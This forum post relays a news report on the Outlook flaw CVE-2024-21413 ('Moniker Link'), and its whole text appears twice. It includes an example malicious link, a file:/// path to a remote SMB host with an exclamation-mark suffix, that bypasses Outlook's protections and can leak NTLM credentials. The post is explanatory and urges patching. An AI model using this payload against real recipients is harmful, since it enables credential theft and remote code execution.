Teacher
Professional
- Messages
- 2,669
- Reaction score
- 819
- Points
- 113
How to protect yourself from an invisible threat and avoid becoming a victim of cybercriminals?
Microsoft warning users about a critical vulnerability in its office suite that allows unauthorized attackers to execute malicious code.
The vulnerability discovered by Check Point was designated CVE-2024-21413 . It is activated when opening emails with malicious links in vulnerable versions of Outlook.
Especially dangerous is the fact that the bug allows hackers to bypass the "Protected View" function, which is designed to block malicious content in Office files. Instead of opening dangerous files in read-only mode, they are launched immediately in edit mode.
According to the company, attacks using CVE-2024-21413 can be carried out remotely, without user interaction, and the complexity of such attacks for hackers remains low.
"Successful exploitation of this vulnerability can grant the attacker high privileges, including the ability to read, write, and delete files," Microsoft said in a statement.
The vulnerability affects several Office products, including Microsoft Office LTSC 2021, Microsoft 365 for Enterprises, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (which are in extended support).
Check Point explains in its report that the vulnerability, which they called "Moniker Link", allows you to bypass the built-in Outlook protections for malicious links embedded in emails using the file:// protocol, accessing the attackers remote server through it.
Adding an exclamation mark immediately after expanding a document allows you to bypass Outlook's security restrictions. In this case, when you click on the link, the application will access the remote resource and open the target file without displaying warnings or errors.
<a href="file:///\\10.10.111.111\test\test.rtf!something">LINK</a>
The vulnerability appeared due to the use of the unsafe MkParseDisplayName API, which may also affect other software that uses it.
As a result of successful exploitation of the CVE-2024-21413 vulnerability, it is possible to steal NTLM credential information and execute arbitrary code using maliciously created Office documents.
Check Point recommends that all Outlook users apply the official security update as soon as possible, which, fortunately, is already available.
Microsoft warning users about a critical vulnerability in its office suite that allows unauthorized attackers to execute malicious code.
The vulnerability discovered by Check Point was designated CVE-2024-21413 . It is activated when opening emails with malicious links in vulnerable versions of Outlook.
Especially dangerous is the fact that the bug allows hackers to bypass the "Protected View" function, which is designed to block malicious content in Office files. Instead of opening dangerous files in read-only mode, they are launched immediately in edit mode.
According to the company, attacks using CVE-2024-21413 can be carried out remotely, without user interaction, and the complexity of such attacks for hackers remains low.
"Successful exploitation of this vulnerability can grant the attacker high privileges, including the ability to read, write, and delete files," Microsoft said in a statement.
The vulnerability affects several Office products, including Microsoft Office LTSC 2021, Microsoft 365 for Enterprises, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (which are in extended support).
Check Point explains in its report that the vulnerability, which they called "Moniker Link", allows you to bypass the built-in Outlook protections for malicious links embedded in emails using the file:// protocol, accessing the attackers remote server through it.
Adding an exclamation mark immediately after expanding a document allows you to bypass Outlook's security restrictions. In this case, when you click on the link, the application will access the remote resource and open the target file without displaying warnings or errors.
<a href="file:///\\10.10.111.111\test\test.rtf!something">LINK</a>
The vulnerability appeared due to the use of the unsafe MkParseDisplayName API, which may also affect other software that uses it.
As a result of successful exploitation of the CVE-2024-21413 vulnerability, it is possible to steal NTLM credential information and execute arbitrary code using maliciously created Office documents.
Check Point recommends that all Outlook users apply the official security update as soon as possible, which, fortunately, is already available.
